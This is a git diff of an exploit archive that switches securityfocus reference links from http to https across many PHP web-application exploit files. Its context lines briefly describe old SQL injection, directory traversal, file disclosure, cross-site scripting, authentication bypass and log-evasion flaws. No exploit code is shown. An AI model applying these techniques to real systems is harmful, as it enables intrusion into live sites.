diff --git a/exploits/php/webapps/1652.php b/exploits/php/webapps/1652.php index c6111367d..41571a0f3 100644 --- a/exploits/php/webapps/1652.php +++ b/exploits/php/webapps/1652.php @@ -22,7 +22,7 @@ die; /* this is based on - http://www.securityfocus.com/bid/16187 + https://www.securityfocus.com/bid/16187 but... look at the server.php source code: diff --git a/exploits/php/webapps/16992.txt b/exploits/php/webapps/16992.txt index a2a9570b2..a128445a7 100644 --- a/exploits/php/webapps/16992.txt +++ b/exploits/php/webapps/16992.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46846/info +source: https://www.securityfocus.com/bid/46846/info Joomla! is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/17951.txt b/exploits/php/webapps/17951.txt index 77cfa1c6a..bf0a8dc5e 100644 --- a/exploits/php/webapps/17951.txt +++ b/exploits/php/webapps/17951.txt @@ -153,5 +153,5 @@ References: =========== http://www.openengine.de/ -http://www.securityfocus.com/bid/49794/info +https://www.securityfocus.com/bid/49794/info http://www.rul3z.de/advisories/SSCHADV2011-019.txt \ No newline at end of file diff --git a/exploits/php/webapps/18155.txt b/exploits/php/webapps/18155.txt index 7fa161c0a..d6bcc21e4 100644 --- a/exploits/php/webapps/18155.txt +++ b/exploits/php/webapps/18155.txt @@ -81,7 +81,7 @@ IX. REFERENCES ------------------------- http://www.zabbix.com https://support.zabbix.com/browse/ZBX-4385 -http://www.securityfocus.com/bid/50803/info +https://www.securityfocus.com/bid/50803/info X. CREDITS ------------------------- diff --git a/exploits/php/webapps/18251.txt b/exploits/php/webapps/18251.txt index c95a3ddec..f56ce948b 100644 --- a/exploits/php/webapps/18251.txt +++ b/exploits/php/webapps/18251.txt 
@@ -11,7 +11,7 @@ # # Script Page : null # -# Reference : http://www.securityfocus.com/bid/47971/info +# Reference : https://www.securityfocus.com/bid/47971/info ################################################################################################ # # SQL Vulnerability diff --git a/exploits/php/webapps/18875.txt b/exploits/php/webapps/18875.txt index b00060d25..80c5b1d76 100644 --- a/exploits/php/webapps/18875.txt +++ b/exploits/php/webapps/18875.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/53463/info +source: https://www.securityfocus.com/bid/53463/info Galette is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/1921.pl b/exploits/php/webapps/1921.pl index ebd7f2dc5..f601b07e5 100755 --- a/exploits/php/webapps/1921.pl +++ b/exploits/php/webapps/1921.pl @@ -3,7 +3,7 @@ # TUFaT FlashBB <= 1.1.5 (phpbb_root_path) Remote File Include Exploit # Bugs found & code By h4ntu aka TeloGanyong # -## base on http://www.securityfocus.com/bid/18456/ +## base on https://www.securityfocus.com/bid/18456/ # ## # http://h4ntu.com (c) 2006 diff --git a/exploits/php/webapps/20158.txt b/exploits/php/webapps/20158.txt index c998d91e6..7785802d3 100644 --- a/exploits/php/webapps/20158.txt +++ b/exploits/php/webapps/20158.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1592/info +source: https://www.securityfocus.com/bid/1592/info PHP-Nuke is a website creation/maintainence tool written in PHP3. It is possible to elevate priviliges in this system from normal user to administrator due to a flaw in authentication code. The problem occurs here: diff --git a/exploits/php/webapps/20208.txt b/exploits/php/webapps/20208.txt index db4fe97d8..4db8de63b 100644 --- a/exploits/php/webapps/20208.txt +++ b/exploits/php/webapps/20208.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1650/info +source: https://www.securityfocus.com/bid/1650/info The explorer.php script within phpPhotoAlbum 0.9.9 and possibly previous versions are vulnerable to directory traversal. By requesting a URL composed of explorer.php and the ../ string in the value of the "folder" variable it is possible for a remote user to and gain read access to any file or browse any directory for which the webserver has read access. diff --git a/exploits/php/webapps/20278.txt b/exploits/php/webapps/20278.txt index 643422e4d..3de40453f 100644 --- a/exploits/php/webapps/20278.txt +++ b/exploits/php/webapps/20278.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1773/info +source: https://www.securityfocus.com/bid/1773/info PHPix is a web-based photo-album system written in PHP. It is vulnerable to an attack that allows a malicious remote user to view arbitrary files on the target webserver with the privileges of the webserver. The problem is that "../" character sequences can be supplied by the user in an http variable that is used to reference a file on the webservers filesystem. As a result, the attacker can construct a path relative to the current working directory of the webserver using ".."'s and then the target filename/path to read any readable (to the uid of the httpd process) file on the filesystem. The information gained may make it easier to compromise the system in other ways. diff --git a/exploits/php/webapps/2030.txt b/exploits/php/webapps/2030.txt index c8c24d3e0..4f7114ae7 100644 --- a/exploits/php/webapps/2030.txt +++ b/exploits/php/webapps/2030.txt @@ -8,7 +8,7 @@ Author : Ahmad Maulana a.k.a Matdhule Date : July 14th 2006 Location : Indonesia, Jakarta Web : http://advisories.echo.or.id/adv/adv39-matdhule-2006.txt - http://www.securityfocus.com/bid/18998 + https://www.securityfocus.com/bid/18998 Critical Lvl : Highly critical Impact : System access Where : From Remote 
diff --git a/exploits/php/webapps/20428.txt b/exploits/php/webapps/20428.txt index e16df578f..b6968dedb 100644 --- a/exploits/php/webapps/20428.txt +++ b/exploits/php/webapps/20428.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1985/info +source: https://www.securityfocus.com/bid/1985/info Phorum is a PHP based web forums package. Due to an error in the implementation of forum selection in administrative scripts, any user can view the any PHP script on the target host. This is due to user-supplied input being referenced as a filename in two locations in the file common.php. For example: diff --git a/exploits/php/webapps/20431.txt b/exploits/php/webapps/20431.txt index 41a2c1a58..a7004c750 100644 --- a/exploits/php/webapps/20431.txt +++ b/exploits/php/webapps/20431.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1997/info +source: https://www.securityfocus.com/bid/1997/info Phorum is a PHP based web forums package. Due to an error in the handling of user input in administrative scripts, any user can view the any file readable by the webserver on the target host. This is due to user-supplied input being referenced as a filename in two locations in the file common.php. diff --git a/exploits/php/webapps/20538.txt b/exploits/php/webapps/20538.txt index 3db9038b9..233105c5a 100644 --- a/exploits/php/webapps/20538.txt +++ b/exploits/php/webapps/20538.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2198/info +source: https://www.securityfocus.com/bid/2198/info A vulnerability has been reported in basilix webmail v. 0.9.7b. diff --git a/exploits/php/webapps/20586.txt b/exploits/php/webapps/20586.txt index 4c8aaa4e2..a36de62eb 100644 --- a/exploits/php/webapps/20586.txt +++ b/exploits/php/webapps/20586.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2271/info +source: https://www.securityfocus.com/bid/2271/info Phorum is a popular, free, open source software package originally written by Brian Moon. The package is designed to add chat/bulletin board style interaction between visitors of a web site. diff --git a/exploits/php/webapps/20587.txt b/exploits/php/webapps/20587.txt index f9cf120a0..f7824f613 100644 --- a/exploits/php/webapps/20587.txt +++ b/exploits/php/webapps/20587.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2272/info +source: https://www.securityfocus.com/bid/2272/info Phorum is a freely available, open source package originally written by Brian Moon. The package is designed to add enhanced features to a web page, allowing users to interact through bulletin board style chats forums and discussions. diff --git a/exploits/php/webapps/20588.txt b/exploits/php/webapps/20588.txt index 8d0925ead..eb836348e 100644 --- a/exploits/php/webapps/20588.txt +++ b/exploits/php/webapps/20588.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2274/info +source: https://www.securityfocus.com/bid/2274/info Phorum is a freely available, open source, popular WWW Board written by Brian Moon. It is designed to enhance the services offered on a web page, allow users to interact with one another through bulletin board chat and discussion. diff --git a/exploits/php/webapps/20729.txt b/exploits/php/webapps/20729.txt index 983bd3a46..0b6eb3588 100644 --- a/exploits/php/webapps/20729.txt +++ b/exploits/php/webapps/20729.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2544/info +source: https://www.securityfocus.com/bid/2544/info PHP-Nuke is a website creation/maintainence tool written in PHP3. diff --git a/exploits/php/webapps/20848.txt b/exploits/php/webapps/20848.txt index f7d5f8ab8..11244fee8 100644 --- a/exploits/php/webapps/20848.txt +++ b/exploits/php/webapps/20848.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2724/info +source: https://www.securityfocus.com/bid/2724/info PHPSlash is a widely used open source Groupware utility. diff --git a/exploits/php/webapps/20995.txt b/exploits/php/webapps/20995.txt index a46493112..175c3675e 100644 --- a/exploits/php/webapps/20995.txt +++ b/exploits/php/webapps/20995.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2987/info +source: https://www.securityfocus.com/bid/2987/info Cobalt Qube is an fully-featured network "server appliance". It includes pre-installed tools and applications and can be put online with very little configuration. diff --git a/exploits/php/webapps/20996.txt b/exploits/php/webapps/20996.txt index b2e59b5f1..3ca66f85d 100644 --- a/exploits/php/webapps/20996.txt +++ b/exploits/php/webapps/20996.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2995/info +source: https://www.securityfocus.com/bid/2995/info Basilix is a web-based mail application. It offers features such as mail attachments, address book, multiple language and theme support. diff --git a/exploits/php/webapps/21022.txt b/exploits/php/webapps/21022.txt index 3cfb8d463..23427a085 100644 --- a/exploits/php/webapps/21022.txt +++ b/exploits/php/webapps/21022.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3079/info +source: https://www.securityfocus.com/bid/3079/info The PHP Base Library('PHPLIB') is a code library which provides support for session management in web applications. It is targeted to developers and is widely used in many web applications, so a strong possibility exists that an application may be using it without the knowledge of the administrator. diff --git a/exploits/php/webapps/21038.txt b/exploits/php/webapps/21038.txt index 95a9c3dc2..485dd7f71 100644 --- a/exploits/php/webapps/21038.txt +++ b/exploits/php/webapps/21038.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3107/info +source: https://www.securityfocus.com/bid/3107/info PHP-Nuke is a website creation/maintenance tool written in PHP3. diff --git a/exploits/php/webapps/21046.txt b/exploits/php/webapps/21046.txt index 869b5bf4d..50e3fb7f7 100644 --- a/exploits/php/webapps/21046.txt +++ b/exploits/php/webapps/21046.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3142/info +source: https://www.securityfocus.com/bid/3142/info phpBB is free, open-source, easy-to-use web forums software. diff --git a/exploits/php/webapps/21065.pl b/exploits/php/webapps/21065.pl index 68e5ab44c..f6543e9cd 100755 --- a/exploits/php/webapps/21065.pl +++ b/exploits/php/webapps/21065.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3167/info +source: https://www.securityfocus.com/bid/3167/info An input validation error exists in phpBB, a freely available WWW forums package. diff --git a/exploits/php/webapps/21119.txt b/exploits/php/webapps/21119.txt index 05ca9cf42..a3ea7f24c 100644 --- a/exploits/php/webapps/21119.txt +++ b/exploits/php/webapps/21119.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3435/info +source: https://www.securityfocus.com/bid/3435/info PostNuke, successor to PHPNuke, is a content management system written in PHP. PostNuke versions 0.62 to 0.64 suffer from a vulnerability that allows a remote user to log-in as any user with known username and ID without authentication. The problem lies in a failure to filter inappropriate characters from variables that can be passed to the program's components by a remote attacker. This allows the attacker to alter a mysql query to the user database, bypassing password checking and assuming the identity of a specified user. diff --git a/exploits/php/webapps/21157.txt b/exploits/php/webapps/21157.txt index 9c057127b..8b9beee41 100644 --- a/exploits/php/webapps/21157.txt +++ b/exploits/php/webapps/21157.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3554/info +source: https://www.securityfocus.com/bid/3554/info Bharat Mediratta Gallery is a free, open source web-based photo album which may be used as an add-on for the PHPNuke web portal. diff --git a/exploits/php/webapps/21165.txt b/exploits/php/webapps/21165.txt index 106aa4060..b9e1dde80 100644 --- a/exploits/php/webapps/21165.txt +++ b/exploits/php/webapps/21165.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3609/info +source: https://www.securityfocus.com/bid/3609/info PHPNuke is a website creation/maintenance tool. diff --git a/exploits/php/webapps/21166.txt b/exploits/php/webapps/21166.txt index b685c8a21..aba2005d2 100644 --- a/exploits/php/webapps/21166.txt +++ b/exploits/php/webapps/21166.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3609/info +source: https://www.securityfocus.com/bid/3609/info PHPNuke is a website creation/maintenance tool. diff --git a/exploits/php/webapps/21168.txt b/exploits/php/webapps/21168.txt index d1be2f472..c0af091cf 100644 --- a/exploits/php/webapps/21168.txt +++ b/exploits/php/webapps/21168.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3643/info +source: https://www.securityfocus.com/bid/3643/info EasyNews is a free, open-source script for displaying news stories on a website. diff --git a/exploits/php/webapps/21206.txt b/exploits/php/webapps/21206.txt index 0219e59a2..4ef06ce38 100644 --- a/exploits/php/webapps/21206.txt +++ b/exploits/php/webapps/21206.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3807/info +source: https://www.securityfocus.com/bid/3807/info phptonuke.php is a PHPNuke AddOn script to insert a PHP script into the middle of a PHPNuke site. It is written and maintained by Lebios. diff --git a/exploits/php/webapps/21230.txt b/exploits/php/webapps/21230.txt index 483b371f0..a42db4f56 100644 --- a/exploits/php/webapps/21230.txt +++ b/exploits/php/webapps/21230.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3889/info +source: https://www.securityfocus.com/bid/3889/info PHPNuke is a website creation/maintenance tool. diff --git a/exploits/php/webapps/21233.txt b/exploits/php/webapps/21233.txt index 64b9316b3..32d79184c 100644 --- a/exploits/php/webapps/21233.txt +++ b/exploits/php/webapps/21233.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3906/info +source: https://www.securityfocus.com/bid/3906/info PHPNuke is a website creation/maintenance tool. It is can be back-ended by a number of database products such as MySQL, PostgreSQL, mSQL, Interbase, Sybase, etc. diff --git a/exploits/php/webapps/21241.txt b/exploits/php/webapps/21241.txt index 71baf4d68..39dce1f55 100644 --- a/exploits/php/webapps/21241.txt +++ b/exploits/php/webapps/21241.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3946/info +source: https://www.securityfocus.com/bid/3946/info WikkiTikkiTavi is a freely available engine for running a Wiki site. Wiki sites are web communities which are based on the idea that every webpage is editable by users of the website. WikkiTikkiTavi is back-ended by a MySQL database and runs on most Linux and Unix variants, as well as Microsoft Windows NT/2000 operating systems. diff --git a/exploits/php/webapps/21277.txt b/exploits/php/webapps/21277.txt index a2e5f01b0..72eff88b6 100644 --- a/exploits/php/webapps/21277.txt +++ b/exploits/php/webapps/21277.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4038/info +source: https://www.securityfocus.com/bid/4038/info Portix-PHP is freely available web portal software. It is written in PHP and will run on most Unix and Linux variants. diff --git a/exploits/php/webapps/21278.txt b/exploits/php/webapps/21278.txt index b83ddd6ab..a8d3d04b9 100644 --- a/exploits/php/webapps/21278.txt +++ b/exploits/php/webapps/21278.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4039/info +source: https://www.securityfocus.com/bid/4039/info Portix-PHP is freely available web portal software. It is written in PHP and will run on most Unix and Linux variants. diff --git a/exploits/php/webapps/21279.txt b/exploits/php/webapps/21279.txt index c88b992b5..e2f6951c6 100644 --- a/exploits/php/webapps/21279.txt +++ b/exploits/php/webapps/21279.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4041/info +source: https://www.securityfocus.com/bid/4041/info Portix-PHP is freely available web portal software. It is written in PHP and will run on most Unix and Linux variants. diff --git a/exploits/php/webapps/21299.txt b/exploits/php/webapps/21299.txt index 9a4303b77..a83e48c8e 100644 --- a/exploits/php/webapps/21299.txt +++ b/exploits/php/webapps/21299.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4165/info +source: https://www.securityfocus.com/bid/4165/info Powie PForum is web forum software, written in PHP and back-ended by MySQL. It will run on most Unix and Linux variants, as well as Microsoft Windows operating systems. diff --git a/exploits/php/webapps/21300.txt b/exploits/php/webapps/21300.txt index fa5eb00fa..fc7b8047e 100644 --- a/exploits/php/webapps/21300.txt +++ b/exploits/php/webapps/21300.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4167/info +source: https://www.securityfocus.com/bid/4167/info The Extreme Message Board (XMB) 1.6 Magic Lantern pre-beta version reportedly allows JavaScript and HTML to be entered in messages. This can be achieved by entering script or HTML between [img] and [/img] tags in a forum message. diff --git a/exploits/php/webapps/21301.txt b/exploits/php/webapps/21301.txt index 2ae273822..25951e4ad 100644 --- a/exploits/php/webapps/21301.txt +++ b/exploits/php/webapps/21301.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4171/info +source: https://www.securityfocus.com/bid/4171/info OpenBB is web forum software written in PHP. It will run on most Linux and Unix variants, in addition to Microsoft Windows operating systems. diff --git a/exploits/php/webapps/21304.txt b/exploits/php/webapps/21304.txt index 04aca687a..78403a67f 100644 --- a/exploits/php/webapps/21304.txt +++ b/exploits/php/webapps/21304.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4182/info +source: https://www.securityfocus.com/bid/4182/info Ikonboard is a Web Bulletin Board Service (BBS) software package written in Perl which runs on Unix and Linux variants. diff --git a/exploits/php/webapps/21312.txt b/exploits/php/webapps/21312.txt index 94fef442b..df931a660 100644 --- a/exploits/php/webapps/21312.txt +++ b/exploits/php/webapps/21312.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4220/info +source: https://www.securityfocus.com/bid/4220/info ReBB is web forum software which will run on most Unix and Linux variants, as well as Microsoft Windows operating systems. It is written in PHP and may be back-ended by a number of databases. diff --git a/exploits/php/webapps/21343.txt b/exploits/php/webapps/21343.txt index 1e48c341b..8f4a7fcec 100644 --- a/exploits/php/webapps/21343.txt +++ b/exploits/php/webapps/21343.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4284/info +source: https://www.securityfocus.com/bid/4284/info PHProjekt is a freely available, open source PHP Groupware package. It is actively maintained by the PHProjekt Development Team. It will run on most Linux and Unix variants, in addition to Microsoft Windows operating systems. diff --git a/exploits/php/webapps/21349.txt b/exploits/php/webapps/21349.txt index 911106064..b680433be 100644 --- a/exploits/php/webapps/21349.txt +++ b/exploits/php/webapps/21349.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4333/info +source: https://www.securityfocus.com/bid/4333/info PHP-Nuke is a popular web based Portal system. It allows users to create accounts and contribute content to the site. diff --git a/exploits/php/webapps/21357.txt b/exploits/php/webapps/21357.txt index d0ff39aea..3daa41a9a 100644 --- a/exploits/php/webapps/21357.txt +++ b/exploits/php/webapps/21357.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4381/info +source: https://www.securityfocus.com/bid/4381/info PostNuke is a content management system originally forked from the PHP-Nuke project. It is implemented in PHP, and available for Windows, Linux and other Unix based systems. diff --git a/exploits/php/webapps/21358.sh b/exploits/php/webapps/21358.sh index 3b7202501..f9b530c83 100755 --- a/exploits/php/webapps/21358.sh +++ b/exploits/php/webapps/21358.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4385/info +source: https://www.securityfocus.com/bid/4385/info SquirrelMail is a feature rich webmail program implemented in the PHP4 language. It is available for Linux and Unix based operating systems. SquirrelMail allows for extended functionality through a plugin system. diff --git a/exploits/php/webapps/21377.txt b/exploits/php/webapps/21377.txt index f1270e177..bfd752968 100644 --- a/exploits/php/webapps/21377.txt +++ b/exploits/php/webapps/21377.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4506/info +source: https://www.securityfocus.com/bid/4506/info SunShop is commercial web store software. It is written in PHP, and will run on most Unix and Linux operating systems as well as Microsoft Windows. diff --git a/exploits/php/webapps/21380.php b/exploits/php/webapps/21380.php index 584213124..3ccc8b504 100644 --- a/exploits/php/webapps/21380.php +++ b/exploits/php/webapps/21380.php 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4512/info +source: https://www.securityfocus.com/bid/4512/info Burning Board is web forum software. It is written in PHP, back-ended by MySQL, and will run on most Unix and Linux variants as well as Microsoft Windows. diff --git a/exploits/php/webapps/21381.txt b/exploits/php/webapps/21381.txt index 0b17fa567..72953ad07 100644 --- a/exploits/php/webapps/21381.txt +++ b/exploits/php/webapps/21381.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4513/info +source: https://www.securityfocus.com/bid/4513/info xGB is guestbook software. It is written in PHP and will run on most Unix and Linux variants as well as Microsoft Windows operating systems. diff --git a/exploits/php/webapps/21382.txt b/exploits/php/webapps/21382.txt index d83b48fb9..e3675b3cd 100644 --- a/exploits/php/webapps/21382.txt +++ b/exploits/php/webapps/21382.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4515/info +source: https://www.securityfocus.com/bid/4515/info xGB is guestbook software. It is written in PHP and will run on most Unix and Linux variants as well as Microsoft Windows operating systems. diff --git a/exploits/php/webapps/21383.txt b/exploits/php/webapps/21383.txt index 0051360b5..bc3e4a983 100644 --- a/exploits/php/webapps/21383.txt +++ b/exploits/php/webapps/21383.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4516/info +source: https://www.securityfocus.com/bid/4516/info xNewsletter is a script that allows web users to subscribe to a newsletter. It is written in PHP and will run on most Unix and Linux variants, as well as Microsoft Windows operating systems. diff --git a/exploits/php/webapps/21391.txt b/exploits/php/webapps/21391.txt index b35ffc3cd..7a04d5d18 100644 --- a/exploits/php/webapps/21391.txt +++ b/exploits/php/webapps/21391.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4540/info +source: https://www.securityfocus.com/bid/4540/info PVote is a web voting system written in PHP. It will run on most Unix and Linux variants as well as Microsoft Windows operating systems. diff --git a/exploits/php/webapps/21397.txt b/exploits/php/webapps/21397.txt index 323b86dd8..ebadf5957 100644 --- a/exploits/php/webapps/21397.txt +++ b/exploits/php/webapps/21397.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4541/info +source: https://www.securityfocus.com/bid/4541/info PVote is a web voting system written in PHP. It will run on most Unix and Linux variants as well as Microsoft Windows operating systems. diff --git a/exploits/php/webapps/21399.txt b/exploits/php/webapps/21399.txt index 5fbcc2e09..b9e943326 100644 --- a/exploits/php/webapps/21399.txt +++ b/exploits/php/webapps/21399.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4548/info +source: https://www.securityfocus.com/bid/4548/info IcrediBB is freely available web forum software. It is written in PHP and will run on most Unix and Linux variants, as well as Microsoft Windows operating systems. diff --git a/exploits/php/webapps/21401.txt b/exploits/php/webapps/21401.txt index 94cd48650..5b5c2cffc 100644 --- a/exploits/php/webapps/21401.txt +++ b/exploits/php/webapps/21401.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4559/info +source: https://www.securityfocus.com/bid/4559/info PostBoard is a freely available, open source message board module for the PostNuke content management system. It is designed for use on the Unix and Linux operating systems. diff --git a/exploits/php/webapps/21403.txt b/exploits/php/webapps/21403.txt index d730dc9c7..bf5255026 100644 --- a/exploits/php/webapps/21403.txt +++ b/exploits/php/webapps/21403.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4561/info +source: https://www.securityfocus.com/bid/4561/info PostBoard is a freely available, open source message board module for the PostNuke content management system. It is designed for use on the Unix and Linux operating systems. diff --git a/exploits/php/webapps/21421.txt b/exploits/php/webapps/21421.txt index 97f80311c..ff94acfd9 100644 --- a/exploits/php/webapps/21421.txt +++ b/exploits/php/webapps/21421.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4596/info +source: https://www.securityfocus.com/bid/4596/info PHProjekt is a freely available, open source PHP Groupware package. It is actively maintained by the PHPProjekt Development Team. It will run on most Linux and Unix variants, in addition to Microsoft Windows operating systems. diff --git a/exploits/php/webapps/21423.txt b/exploits/php/webapps/21423.txt index d3a23238c..4936a6a94 100644 --- a/exploits/php/webapps/21423.txt +++ b/exploits/php/webapps/21423.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4603/info +source: https://www.securityfocus.com/bid/4603/info Ultimate PHP Board (UPB) is web forum software. It will run on most Unix and Linux variants, as well as Microsoft Windows operating systems. diff --git a/exploits/php/webapps/21424.txt b/exploits/php/webapps/21424.txt index 7bac33b94..21c2925c2 100644 --- a/exploits/php/webapps/21424.txt +++ b/exploits/php/webapps/21424.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4615/info +source: https://www.securityfocus.com/bid/4615/info Admanager is banner advertisement management software. It is written in PHP and will run on most Unix and Linux variants, in addition to Microsoft Windows operating systems. diff --git a/exploits/php/webapps/21425.txt b/exploits/php/webapps/21425.txt index e5280c2b0..4e349237a 100644 --- a/exploits/php/webapps/21425.txt +++ b/exploits/php/webapps/21425.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4617/info +source: https://www.securityfocus.com/bid/4617/info DNSTools is a web based managment tool for DNS information. It is implemented in PHP, and available for Linux and Solaris. diff --git a/exploits/php/webapps/21426.txt b/exploits/php/webapps/21426.txt index 27dffe949..8cb15e638 100644 --- a/exploits/php/webapps/21426.txt +++ b/exploits/php/webapps/21426.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4618/info +source: https://www.securityfocus.com/bid/4618/info Blahz-DNS is a web based management tool for DNS information. It is implemented in PHP, and available for Linux systems. diff --git a/exploits/php/webapps/21427.txt b/exploits/php/webapps/21427.txt index be7c0e395..822449768 100644 --- a/exploits/php/webapps/21427.txt +++ b/exploits/php/webapps/21427.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4619/info +source: https://www.securityfocus.com/bid/4619/info MiniBB is web forum software. It is written in PHP and will run on most Unix and Linux variants as well as Microsoft Windows operating systems. diff --git a/exploits/php/webapps/21436.txt b/exploits/php/webapps/21436.txt index e8c4190f5..359eb4eb0 100644 --- a/exploits/php/webapps/21436.txt +++ b/exploits/php/webapps/21436.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4673/info +source: https://www.securityfocus.com/bid/4673/info B2 is a news/weblog tool written in php. b2 allows webmasters to quickly post news on the frontpage, and let viewers interact with each other. It is available primarily for Unix and Linux. diff --git a/exploits/php/webapps/21447.txt b/exploits/php/webapps/21447.txt index 0694fdf3d..bb3eabb98 100644 --- a/exploits/php/webapps/21447.txt +++ b/exploits/php/webapps/21447.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4721/info +source: https://www.securityfocus.com/bid/4721/info XMB Forum 1.6 Magic Lantern is a web-based discussion forum. It is vulnerable to a number of cross-site scripting issues because of improper filtering of user input. diff --git a/exploits/php/webapps/21448.txt b/exploits/php/webapps/21448.txt index 4c3623d33..b848a080d 100644 --- a/exploits/php/webapps/21448.txt +++ b/exploits/php/webapps/21448.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4722/info +source: https://www.securityfocus.com/bid/4722/info XMB Forum 1.6 Magic Lantern allows remote users to conduct activities in the forum while bypassing normal logging functions. This is accomplished by submitting an arbitrary string as the "analized" variable to index.php. Log information is written only if this variable is empty, so submitting a string to it bypassing the logging. diff --git a/exploits/php/webapps/21449.txt b/exploits/php/webapps/21449.txt index 3b3fdb1b4..f43b11e34 100644 --- a/exploits/php/webapps/21449.txt +++ b/exploits/php/webapps/21449.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4740/info +source: https://www.securityfocus.com/bid/4740/info NOCC is a web based email client implemented in PHP4. It includes support for POP3, SMTP and IMAP servers, MIME attachments and multiple languages. diff --git a/exploits/php/webapps/21454.txt b/exploits/php/webapps/21454.txt index c6922e80a..4bcf02eba 100644 --- a/exploits/php/webapps/21454.txt +++ b/exploits/php/webapps/21454.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4756/info +source: https://www.securityfocus.com/bid/4756/info Pseudo-frames is an application written in PHP and is maintained by Clicky Web. diff --git a/exploits/php/webapps/21459.txt b/exploits/php/webapps/21459.txt index ab43fb683..63a1d8549 100644 --- a/exploits/php/webapps/21459.txt +++ b/exploits/php/webapps/21459.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4763/info +source: https://www.securityfocus.com/bid/4763/info Phorum is a PHP based web forums package designed for most UNIX variants, Linux, and Microsoft Windows operating systems. diff --git a/exploits/php/webapps/21461.txt b/exploits/php/webapps/21461.txt index 62c6f4ae3..39c54360b 100644 --- a/exploits/php/webapps/21461.txt +++ b/exploits/php/webapps/21461.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4767/info +source: https://www.securityfocus.com/bid/4767/info Phorum is a PHP based web forums package designed for most UNIX variants, Linux, and Microsoft Windows operating systems. diff --git a/exploits/php/webapps/21463.txt b/exploits/php/webapps/21463.txt index b975394a6..048f033bd 100644 --- a/exploits/php/webapps/21463.txt +++ b/exploits/php/webapps/21463.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4770/info +source: https://www.securityfocus.com/bid/4770/info mcNews is a set of scripts for allowing users to post news stories on a webpage. It will run on most Linux and Unix variants as well as Microsoft Windows operating systems. diff --git a/exploits/php/webapps/21474.txt b/exploits/php/webapps/21474.txt index 110b36920..d510f4250 100644 --- a/exploits/php/webapps/21474.txt +++ b/exploits/php/webapps/21474.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4819/info +source: 